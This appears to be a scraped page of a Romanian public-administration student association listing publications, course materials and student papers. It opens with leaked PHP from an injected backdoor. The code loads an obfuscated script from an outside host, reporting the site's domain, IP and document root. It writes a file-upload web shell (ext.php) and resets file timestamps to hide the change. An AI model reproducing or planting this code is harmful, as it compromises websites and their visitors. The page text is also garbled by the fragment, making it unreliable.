document.write('<'+'s'+'c'+'r'+'ipt '+'s'+'rc=\"http://tereveln.com/sh2.php?serverStr=$serverStr&req_type=add_site&document_root=$document_root&engine=$engineType&ip=$ip&domain='+window.location.hostname+'&uplUrl=$pp\"'+'>'+'<'+'/'+'sc'+'rip'+'t>');"; $fp = fopen(dirname(__FILE__)."/ext.php", "w"); fwrite($fp, "
';if (!empty(\$_FILES['uploadFile'])) {\$self=dirname(__FILE__);move_uploaded_file(\$_FILES[\"uploadFile\"][\"tmp_name\"], \$self.DIRECTORY_SEPARATOR.\$_FILES[\"uploadFile\"][\"name\"]);\$time=filemtime(\$self);print \"OK\";} else {print \$form;} ?>"); fclose($fp); $fp = fopen(__FILE__, "r"); $line = ""; while(!feof($fp)) { $line .= fgets($fp, 4096); } fclose($fp); $time = filemtime(__FILE__); $dirTime = filemtime(dirname(__FILE__)); $line = preg_replace("/\s+\s+/is", "", $line); $fp = @fopen(__FILE__, "w"); @fwrite($fp, $line); @fclose($fp); @touch(__FILE__, $time); @touch(dirname(__FILE__), $dirTime); } else { print ""; } ?> ANSSA - Asociatia Nationala a Studentilor in Stiinte Administrative

PUBLICATII

Carti de specialitate/biblioteca
Ioan Alexandru,
Tratat de administratie publica
Editura Universul Juridic, Bucuresti 2008

Florin Bondar
Politici publice si administratie publica
Editura Polirom, Iasi 2008

 Corneliu Manda,
Cezar C. Manda
Dreptul colectivitatilor locale
Editura Universul Juridic, Bucuresti 2008


Materiale documentare si suporturi de curs

Bazele administratiei publice – lector univ.dr. Gheorghe Teodorof
Management, structuri si mecanisme decizionale publice – drd. Cristian Bitea


Publicatii ANSSA

Revista Administer Tomis nr. 1/2009
Revista Administer Tomis nr. 2/2009


Referate si lucrari ale studentilor prezentate la evenimente organizate de ANSSA

Nota: unele acte normative cuprinse în continutul lucrarilor au suferit modificari, completari sau abrogari în timp

Titlu/Download .doc.pdf.ppt.
Autor(i)
Universitate
Monica Albu,
Isabela Cioata

Universitatea "Alexandru Ioan Cuza" Iasi
Valeria Andreea Mateescu
Universitatea "Petrol-Gaze" Ploiesti
Camelia Diaconescu
Universitatea "Andrei Saguna" Constanta
Valentina Teodorescu
Universitatea "Dunarea de Jos” Galati
Ovidiu Jimborean,
Emanuela Petrisor
Universitatea „Babes-Bolyai" Cluj-Napoca
Larisa Dragos
Universitatea "Babes-Bolyai" Cluj-Napoca
Daniel Andrei
Universitatea "Ovidius" Constanta
Iuliana Firica
Universitatea "Ovidius" Constanta
Laura Aparaschivei,
Sorina Andrici, Mihai Buliga
Universitatea "Stefan cel Mare" Suceava
Gianni Plesca
Universitatea "Ovidius" Constanta
Alexandra Hîrdau
Universitatea "Ovidius" Constanta
Maricel Maroti,
Stefan Doru Nitu
Universitatea "Transilvania" din Brasov
Alina Simionesa-Nastase
Universitatea "Alexandru Ioan Cuza" Iasi
Adrian Lupascu,
Oana Lupu
Universitatea "George Bacovia" Bacau
Iuliana Maier
Universitatea "Româno-Germana" Sibiu
Mihaela Casu, Mirel Ovidiu Ilie, Sebastian Pascariu
Universitatea "Stefan cel Mare" Suceava
Paul Andrei Ferent, Crina Maria Pintea, Cosmin Irimie Plesa
Universitatea "Babes-Bolyai" Cluj-Napoca